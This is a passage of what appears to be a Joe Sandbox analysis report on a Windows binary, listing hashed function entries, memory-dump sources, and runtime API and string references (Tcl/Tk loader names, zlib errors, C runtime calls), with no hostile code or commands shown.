                                                                                                                                                                                                                                • Instruction ID: d0ee589d1281d71e3a34cff6dd1bc709d7b0c5895c603c0e8665e6d90be33361
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D215032A1CE418ADB61BF18D48237977A0BB84B94F544238EE5E976DDDF3DD4118B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                • Instruction ID: 1f3d8853ab592a710b04ff31ada186bb604cd8e8fe0a49fecf4c74ac41599cfc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E01C461A4C74684EA04FF529982079A691BF86FE4F494631EE5C93BDFCF3CE4018310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF64488B32A,?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A), ref: 00007FF64488EBED
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                • Instruction ID: 3cf1118c5be338a9ca19caa8bf08aafb35586c767c7ac40de92f4aa1935e9d03
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1F03A64F0D64789FE59776A98D73B912955FD8B80F4C8530CD0FE63DAEE2CE4818220
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF644880C90,?,?,?,00007FF6448822FA,?,?,?,?,?,00007FF644883AE9), ref: 00007FF64488D63A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                • Instruction ID: 0ce46b99c2161101720227423c37da436508429bcf98fc69ee809bc8fab3f170
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EF0F811F4D24A8DFE65B7B158C367912D15F88BB0F480730DD2EC62CAEE2DE4809690
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                • Instruction ID: 8e171445b0fa6372433932dfcf8b905ced7772f3c74ceed9d295bd9733f6e47c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C102A024A0DF47E9FA15FB59A9E25B423A1BF84B85F541031DC2E862ACEF3DF159C204
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                • Instruction ID: a51563dc12837f38319fae3827ac8aa499cbbc6cb9a2171b36941a117f7cc576
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9B2C172A1CA82CEE765AE64D4827FD37A1FB54788F505135DE0A97A8CDF39E900CB40
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                • API String ID: 0-2665694366
                                                                                                                                                                                                                                • Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                                • Instruction ID: a657645c5a88702c3075fc006201d35c58289ec35ab43038213e7171f7556dd6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF52C576B1C6A54BD794BF14C8A9B7E3BAAFB84344F014139EA4A87784DF39D844CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                • Instruction ID: 625ac85325962cda5a6fd4c75934b7fa954b022cbb821c6a6661f7e51c7a068f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7311D7260CB81CAEB64AF60E8913EE63A4FB84744F44403ADA4E87B98DF79D548C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895C45
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644895598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955AC
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF64488A8DF,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488A909
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF64488A8DF,?,?,?,?,?,00007FF64488A7CA), ref: 00007FF64488A92E
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895C34
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6448955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64489560C
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895EAA
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895EBB
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895ECC
                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64489610C), ref: 00007FF644895EF3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4070488512-0
                                                                                                                                                                                                                                • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                • Instruction ID: 145fb6830e9407938e35f84bf17f59a8f148022e2e1c5078413f6604dd990ddb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10D1A123A1CA428EE764BF25D8D21B96B51EF84B94F448135EE0DC7A9EDF3EE4418740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                • Instruction ID: dca020750825312e0512b41a023a55c1df99d0a722e480da8df9dcd5d666469b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF31513660CF8189EB64EB65E8812AE73A4FB84754F540135EE9D83B98DF3DD145CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                • Instruction ID: 42465edde9679dc7cdadb9c7c662bb0e002e8e86ee19168b88f6c310d7881357
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FB1C522B1CA9289FA61BB6199821B96391EF44BE5F445131EE5D87BCDEF3DE441C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895EAA
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6448955F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64489560C
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895EBB
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644895598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955AC
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF644895ECC
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6448955C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6448955DC
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF64488A948: GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968
                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64489610C), ref: 00007FF644895EF3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3458911817-0
                                                                                                                                                                                                                                • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                • Instruction ID: 0efd6df8aaa5e2b1059a6020ef1ebdec738c6e2cd5ea03de9292157ad21c3828
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98514D32A1CA828EE760FF25E8D25A96761FF88794F404135EE4DC7A9ADF3DE4418740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                • Instruction ID: 5b4465ad599c622c6c306571a197281bc630650e0555362a133ebd215f61e20f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6110A22B18F05CAEB00AB60E8952B933A4FB59B58F441E31DE6D86BA8DF78D1548340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcpy_s
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1502251526-0
                                                                                                                                                                                                                                • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                • Instruction ID: c19829dff14776a66f670340b45933963283610047bd608856b24642a6392a2d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7C1D672B1CA86CBD724EF15A08566AB791F788B84F448135DF4A83758DF3EE801CB40
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
